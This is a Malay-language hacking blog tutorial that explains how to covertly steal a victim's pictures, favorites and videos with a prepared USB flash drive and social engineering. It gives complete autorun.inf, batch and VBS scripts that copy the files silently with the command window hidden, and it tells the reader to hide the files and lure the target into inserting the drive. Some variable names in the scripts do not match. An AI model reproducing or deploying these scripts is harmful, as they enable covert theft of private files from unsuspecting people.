Matlamat anda kali ini ialah anda mahu mengambil secara senyap fail sulit dari PC sasaran anda. Namun bagaimana cara melakukannya? Alat yang perlu ada kali ini cuma pemacu kilat (flash drive @ USB pendrive) dan sedikit teknik kejuruteraan sosial (Social Engineering)
Mr.Hac akan cuba sedaya upaya untuk memberikan penerangan terperinci akan langkah-langkah yang perlu anda lakukan untuk menjayakan tutorial kali ini. Kaedah ini adalah lebih kurang sama dengan tutorial Mr.Hac yang terdahulu iaitu -> Bagaimana Cara Mendapatkan Kata Laluan Yang Tersimpan Dalam Komputer?
Lihat gambar di atas. Anda perlu mencipta 4 fail untuk menjayakan tutorial ini. Mari kita ikuti langkah-langkah yang tersebut di bawah:
1. Langkah pertama, buka Notepad dan salin kod berikut dan simpan sebagai (save as) autorun.inf (bagi pengguna Ubuntu, boleh buka Notepad dalam perisian Wine. Sila pasang Wine terlebih dahulu):
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shellopencommand=launch.bat
Baris kod untuk icon adalah terletak pada pilihan anda. Anda boleh gunakannya atau biar icon lalai (default) sahaja yang digunakan.
2. Buka Notepad lalu salin dan tampal baris kod di bawah dan simpan sebagai file.bat
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%pictures” “%drive%allMy pics”
%backupcmd% “%USERPROFILE%favorites” “%drive%allFavorites”
%backupcmd% “%USERPROFILE%videos” “%drive%allvids”
@echo off
cls
Kita memerlukan fail ini untuk menyalin fail yang dikehendaki dalam folder ‘pictures’, ‘favourites’ dan ‘videos’ kepada pemacu kilat ke dalam folder yang kita cipta dengan nama ‘all’.
Untuk lebih faham, lihat carta alir di bawah:
%USERPROFILE%pictures <— ini ialah folder sasaran
%drive%allMy pics <— ini ialah folder destinasi tempat fail sulit itu akan disalin
3. Buka Notepad, salin dan tampal kod di bawah lalu simpan sebagai invisible.vbs
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Baris kod ini akan menjalankan fail file.bat itu tadi sebagai satu proses jadi tampilan CMD akan ‘disembunyikan di sebalik tabir’. Maknanya buat kerja curi tu senyap-senyap la! Haha!
4. Orait. Final step. Buka Notepad, salin dan tampal baris kod di bawah sebagai launch.bat
wscript.exe invisible.vbs file.bat
Ok. Fail launch.bat ini akan mencari fail invisible.vs lalu menjalankan ia bersama dengan file.bat, dengan erti kata file.bat menjalankan kod dari fail invisible.vbs
5. Salin kesemua fail ini ke dalam pemacu kilat anda, cipta satu folder dengan nama ‘all’, dan sorok (hide) kesemua fail ini (klik kanan, tandakan pada ‘Hidden’). Salin juga fail icon (.ico) jika diperlukan (jika anda letakkan ia sekali dalam tetapan baris kod di atas)
Langkah terakhir? Apa lagi! Pergi kepada sasaran dan tawarkan kepadanya sesuatu yang berharga dalam pemacu kilat anda seperti lagu, video dan lain-lain. Apabila anda masukkan saja pemacu kilat ke dalam port USB komputer sasaran, maka biarkan sahaja fail-fail di atas menjalankan kerjanya! Menarik bukan?
pstu maklumat mangsa ada kt mana ? ?